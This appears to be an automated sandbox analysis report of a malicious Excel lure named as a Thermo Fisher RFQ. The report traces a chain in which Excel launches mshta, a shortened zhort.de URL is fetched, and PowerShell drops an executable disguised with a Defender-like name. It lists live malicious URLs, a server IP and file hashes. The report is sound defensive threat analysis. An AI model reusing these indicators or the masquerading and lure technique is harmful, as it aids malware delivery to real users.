    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C2A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: mshta.exe, 00000004.00000003.405684824.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.428803298.000000001A7B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: powershell.exe, 00000007.00000002.426492015.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.470282539.0000000002471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.428803298.000000001A7B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: powershell.exe, 00000007.00000002.428470828.00000000122F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000007.00000002.428470828.00000000122F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000007.00000002.428470828.00000000122F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000007.00000002.428470828.00000000122F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C2A9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460892429.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458342798.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460919609.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461175381.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/
    Source: mshta.exe, 00000004.00000003.406480002.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/.n
    Source: mshta.exe, 00000004.00000003.406507991.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405709089.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406249616.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407210728.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406947877.0000000000111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/60
    Source: mshta.exe, 0000000C.00000002.461061796.000000000047A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/6XcI3x
    Source: Thermo Fisher RFQ_TFS-1805.xls, ~DF8BC8A5344F5550C8.TMP.0.drString found in binary or memory: https://zhort.de/6XcI3xI
    Source: mshta.exe, 00000004.00000002.407167723.00000000000CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/6XcI3xQ
    Source: mshta.exe, 0000000C.00000002.461061796.000000000047A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/6XcI3xi
    Source: mshta.exe, 0000000C.00000002.461061796.000000000047A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/6XcI3xp
    Source: mshta.exe, 0000000C.00000003.460855447.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000468E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/6XcI3xta
    Source: mshta.exe, 00000004.00000002.407362361.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406480002.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.00000000033A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/6XcI3xtalicyu
    Source: mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/Fi
    Source: mshta.exe, 00000004.00000003.406507991.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405709089.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406249616.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407210728.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406947877.0000000000111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/tr
    Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49161 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49168 version: TLS 1.2
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_00405718 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_00405718
    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

    System Summary

    barindex
    Source: Thermo Fisher RFQ_TFS-1805.xlsOLE: Microsoft Excel 2007+
    Source: Thermo Fisher RFQ_TFS-1805.xlsOLE: Microsoft Excel 2007+
    Source: ~DF8BC8A5344F5550C8.TMP.0.drOLE: Microsoft Excel 2007+
    Source: ~DF8BC8A5344F5550C8.TMP.0.drOLE: Microsoft Excel 2007+
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ideanetowroking[1].htaJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MeMpEng[1].exeJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MeMpEng.exeJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040352F
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 20_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,20_2_0040352F
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeFile created: C:\Windows\resources\0409Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE8997352E7_2_000007FE8997352E
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899776AD7_2_000007FE899776AD
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_729F1BFF11_2_729F1BFF
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 20_2_6A2B1BFF20_2_6A2B1BFF
    Source: Thermo Fisher RFQ_TFS-1805.xlsStream path 'MBD004B4618/\x1Ole' : https://zhort.de/6XcI3xI|Ji%wK<6MU>=kbz],3oCa 8$gT&"q:fg%2fE9ac\E PuZan2mT_aAFJ#Tc43TC+`GSK`n{>lxOE=RXitwh)noMaK0zSxdWy5Y3ys5COwLfff0jJqgeho3sgXifXKFaviqArVYhMTfZzmRSR4KcAN20MB0lQJsEaKI52v3kn34NSFUgJY4Z4VFBtgtMbOqBz24ZHj"P<>Ud&&
    Source: ~DF8BC8A5344F5550C8.TMP.0.drStream path 'MBD004B4618/\x1Ole' : https://zhort.de/6XcI3xI|Ji%wK<6MU>=kbz],3oCa 8$gT&"q:fg%2fE9ac\E PuZan2mT_aAFJ#Tc43TC+`GSK`n{>lxOE=RXitwh)noMaK0zSxdWy5Y3ys5COwLfff0jJqgeho3sgXifXKFaviqArVYhMTfZzmRSR4KcAN20MB0lQJsEaKI52v3kn34NSFUgJY4Z4VFBtgtMbOqBz24ZHj"P<>Ud&&
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\LangDLL.dll 131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll 23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: String function: 00402DCB appears 52 times
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@23/47@3/2
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040352F
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 20_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,20_2_0040352F
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_004049C4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,11_2_004049C4
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_004021CF CoCreateInstance,11_2_004021CF
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MeMpEng.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7C40.tmpJump to behavior
    Source: Thermo Fisher RFQ_TFS-1805.xlsOLE indicator, Workbook stream: true
    Source: ~DF8BC8A5344F5550C8.TMP.0.drOLE indicator, Workbook stream: true
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................Z.......Z.....}..w..............w.......w......1w.....(.P.......w......3w......................M..............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................?.|k....}..w.....M......\.y.......w.............(.P............. .......8...............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................M......}..w.............BQ.......|k......Q.....(.P............. .......................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................?.|k....}..w.....M......\.y.......w.............(.P............. .......8...............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................M......}..w.............BQ.......|k......Q.....(.P............. .......................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..BQ.......|k......Q.....(.P............. ............... .......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................M......}..w.............BQ.......|k......Q.....(.P............. .......................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P............. ...............8.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................M......}..w.............BQ.......|k......Q.....(.P............. .......................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n... ...............F.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................M......}..w.............BQ.......|k......Q.....(.P............. ...............l.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........M......}..w.............BQ.......|k......Q.....(.P............. .......................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................M..............0.G".....WY.....}..w....8.......@Ex.....^...............(.P............. .......................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................M.......................WY.....}..w....8.......@Ex.....^...............(.P............. .......................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................Pf.............................}..w..............D.......D......1D.....(.P.......D......3D......................*..............
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cmf.....................v.nk....}..w.....*......\.F.......D.............(.P.....h.......d.......................................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................*......}..w..............l.......nk....`Q......(.P.....h.......d.......................................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cmf.....................v.nk....}..w.....*......\.F.......D.............(.P.....h.......d.......................................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................*......}..w..............l.......nk....`Q......(.P.....h.......d.......................................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...l.......nk....`Q......(.P.....h.......d............... .......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................*......}..w..............l.......nk....`Q......(.P.....h.......d.......................................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....h.......d...............8.......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................*......}..w..............l.......nk....`Q......(.P.....h.......d.......................................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...d...............F.......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................*......}..w..............l.......nk....`Q......(.P.....h.......d...............l.......................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........*......}..w..............l.......nk....`Q......(.P.....h.......d.......................................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................*..............0..).{...W......}..w............@EE.....^...............(.P.....h.......d.......................................
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................*...................{...W......}..w............@EE.....^...............(.P.....h.......d.......................................
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: Thermo Fisher RFQ_TFS-1805.xlsVirustotal: Detection: 20%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
